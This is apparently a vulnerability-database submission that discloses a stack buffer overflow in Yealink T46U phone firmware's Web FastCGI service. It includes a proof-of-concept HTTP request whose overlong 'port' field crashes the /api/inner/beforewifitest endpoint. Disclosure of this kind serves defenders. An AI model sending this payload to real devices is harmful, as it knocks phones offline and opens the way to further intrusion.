| Title | yealink T46U 108.87.50.1 stack |
|---|
| Description | Yealink T46U phone firmware `x.x.x.x` contains a stack buffer overflow vulnerability in the Web FastCGI service `fcgiserver`. The vulnerable endpoint is:
```text
POST /api/inner/beforewifitest
```
This endpoint is handled by the `StartReportInformation()` function in `fcgiserver`. The handler reads fields such as `ip`, `port`, and `protocol` from the JSON request body. The `port` field has no length limit and is later concatenated into a fixed-size stack buffer, which triggers a stack buffer overflow.
Testing confirmed that an overly long `port` field causes the service to crash abnormally, while a shorter `port` value returns normally.
poc:
POST /api/inner/beforewifitest?p=Setting&t=<timestamp> HTTP/1.1
Host: <target>
Cookie: JSESSIONID=<valid-session>
X-Csrftoken: <valid-token>
Content-Type: application/json;charset=UTF-8
{"ip":"127.0.0.1","port":"7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777","protocol":"tcp"} |
|---|
| Source | ⚠️ http://cdn2.v50to.cc/T46U/T46U_beforewifitest_stack_overflow.zip |
|---|
| User | CookedMelon (UID 52513) |
|---|
| Submission | 05/20/2026 17:32 (26 days ago) |
|---|
| Moderation | 06/14/2026 15:54 (25 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 370861 [Yealink SIP-T46U 108.87.50.1 Web FastCGI Service beforewifitest StartReportInformation port stack-based overflow] |
|---|
| Points | 20 |
|---|